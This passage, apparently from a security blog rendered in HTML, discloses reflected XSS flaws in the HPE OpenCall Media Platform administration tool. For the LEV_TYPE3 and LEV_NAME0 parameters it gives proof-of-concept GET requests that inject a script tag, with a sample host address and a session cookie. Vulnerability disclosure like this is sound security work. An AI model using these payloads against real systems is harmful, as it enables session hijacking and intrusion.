id=\"crayon-58fe79da8363f671945357-6\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da8363f671945357-7\"><span class=\"crayon-v\">DNT<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8363f671945357-8\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/172.27.116.40:4443\/OCMPOAM\/BMPFFaultMgr.chailet<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da8363f671945357-9\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">JSESSIONID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">4F99C27525BFDB44D46E3A109FA49DAC<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8363f671945357-10\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">keep<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">alive<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0034 seconds] -->  <\/p>\n<p><strong>Platform Administration Tool \u2013 <em>LEV_TYPE3<\/em> parameter<\/strong><br \/> HPE OpenCall Media Platform (OCMP) does not sanitize <em>GetMapAction<\/em> function parameter LEV_TYPE3 input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).<\/p>\n<p>The vulnerable URL: <em>\/OCMPOAM\/BMPFFaultMgr.chailet?GetMapAction=HTML&amp;LEVEL=TOP_LEVEL&amp;TYPE=1&amp;NAME=Root&amp;DATE=0&amp;LEV_NUM=0&amp;LEV_NAME0=N0&amp;LEV_NAME1=N1&amp;LEV_NAME2=N2&amp;LEV_NAME3=N3&amp;LEV_TYPE0=T0&amp;LEV_TYPE1=T1&amp;LEV_TYPE2=T2&amp;<strong>LEV_TYPE3<\/strong>=T3ecc32&#8243;&gt;&lt;script&gt;alert(1)&lt; %2fscript&gt;54a0f<\/em><\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>An Attacker send the following GET request to the victims machine:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58fe79da83644599088184\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/OCMPOAM\/BMPFFaultMgr.chailet?GetMapAction=HTML&amp;LEVEL=TOP_LEVEL&amp;TYPE=1&amp;NAME=Root&amp;DATE=0&amp;LEV_NUM=0&amp;LEV_NAME0=N0&amp;LEV_NAME1=N1&amp;LEV_NAME2=N2&amp;LEV_NAME3=N3&amp;LEV_TYPE0=T0&amp;LEV_TYPE1=T1&amp;LEV_TYPE2=T2&amp;LEV_TYPE3=T3ecc32&#8243;&gt;&lt;script&gt;alert(1)&lt;%2fscript&gt;54a0f HTTP\/1.1  Host: 172.27.116.40:4443  User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\/20100101 Firefox\/40.0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8  Accept-Language: en-US,en;q=0.5  Accept-Encoding: gzip, deflate  DNT: 1  Referer: https:\/\/172.27.116.40:4443\/OCMPOAM\/BMPFFaultMgr.chailet  Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC  Connection: keep-alive<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83644599088184-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83644599088184-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83644599088184-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83644599088184-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83644599088184-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83644599088184-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83644599088184-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83644599088184-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83644599088184-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83644599088184-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58fe79da83644599088184-1\"><span class=\"crayon-v\">GET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">OCMPOAM<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">BMPFFaultMgr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">chailet<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">GetMapAction<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">HTML<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEVEL<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">TOP_LEVEL<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">TYPE<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">NAME<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">Root<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">DATE<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NUM<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME0<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME1<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME2<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N2<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME3<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N3<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE0<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE1<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE2<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T2<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE3<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-i\">T3ecc32<\/span>&#8220;<span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">script<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2fscript<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">54a0f<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83644599088184-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">172.27.116.40<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">4443<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83644599088184-3\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-i\">NT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6.1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">WOW64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">40.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">20100101<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Firefox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">40.0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83644599088184-4\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83644599088184-5\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.5<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83644599088184-6\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83644599088184-7\"><span class=\"crayon-v\">DNT<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83644599088184-8\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/172.27.116.40:4443\/OCMPOAM\/BMPFFaultMgr.chailet<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83644599088184-9\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">JSESSIONID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">4F99C27525BFDB44D46E3A109FA49DAC<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83644599088184-10\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">keep<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">alive<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0029 seconds] -->  <\/p>\n<p><strong>Platform Administration Tool \u2013 <em>LEV_NAME0<\/em> parameter<\/strong><\/p>\n<p>HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction function parameter LEV_NAME0 input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).<\/p>\n<p>The vulnerable URL: <em>\/OCMPOAM\/BMPFFaultMgr.chailet?GetMapAction=HTML&amp;LEVEL=TOP_LEVEL&amp;TYPE=1&amp;NAME=Root&amp;DATE=0&amp;LEV_NUM=0&amp;<strong>LEV_NAME0<\/strong>=N0fa802&#8243;&gt;&lt;script&gt;alert(1)&lt; %2fscript&gt;671a8&amp;LEV_NAME1=N1&amp;LEV_NAME2=N2&amp;LEV_NAME3=N3&amp;LEV_TYPE0=T0&amp;LEV_TYPE1=T1&amp;LEV_TYPE2=T2&amp;LEV_TYPE3=T3<\/em><\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>An Attacker send the following GET request to the victims machine:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58fe79da8364d994565611\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/OCMPOAM\/BMPFFaultMgr.chailet?GetMapAction=HTML&amp;LEVEL=TOP_LEVEL&amp;TYPE=1&amp;NAME=Root&amp;DATE=0&amp;LEV_NUM=0&amp;LEV_NAME0=N0fa802&#8243;&gt;&lt;script&gt;alert(1)&lt;%2fscript&gt;671a8&amp;LEV_NAME1=N1&amp;LEV_NAME2=N2&amp;LEV_NAME3=N3&amp;LEV_TYPE0=T0&amp;LEV_TYPE1=T1&amp;LEV_TYPE2=T2&amp;LEV_TYPE3=T3 HTTP\/1.1  Host: 172.27.116.40:4443  User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\/20100101 Firefox\/40.0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8  Accept-Language: en-US,en;q=0.5  Accept-Encoding: gzip, deflate  DNT: 1  Referer: https:\/\/172.27.116.40:4443\/OCMPOAM\/BMPFFaultMgr.chailet  Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC  Connection: keep-alive<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8364d994565611-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8364d994565611-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8364d994565611-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8364d994565611-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8364d994565611-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8364d994565611-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8364d994565611-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8364d994565611-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8364d994565611-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8364d994565611-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58fe79da8364d994565611-1\"><span class=\"crayon-v\">GET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">OCMPOAM<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">BMPFFaultMgr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">chailet<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">GetMapAction<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">HTML<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEVEL<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">TOP_LEVEL<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">TYPE<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">NAME<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">Root<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">DATE<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NUM<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME0<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-i\">N0fa802<\/span>&#8220;<span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">script<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2fscript<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">671a8<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME1<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME2<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N2<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME3<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N3<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE0<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE1<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE2<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T2<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE3<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">T3 <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8364d994565611-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">172.27.116.40<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">4443<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da8364d994565611-3\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-i\">NT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6.1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">WOW64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">40.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">20100101<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Firefox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">40.0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8364d994565611-4\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da8364d994565611-5\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.5<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8364d994565611-6\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da8364d994565611-7\"><span class=\"crayon-v\">DNT<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8364d994565611-8\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/172.27.116.40:4443\/OCMPOAM\/BMPFFaultMgr.chailet<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da8364d994565611-9\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">JSESSIONID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">4F99C27525BFDB44D46E3A109FA49DAC<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8364d994565611-10\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">keep<\/span><span class=\"crayon-o\">&#8211;<\/span><span 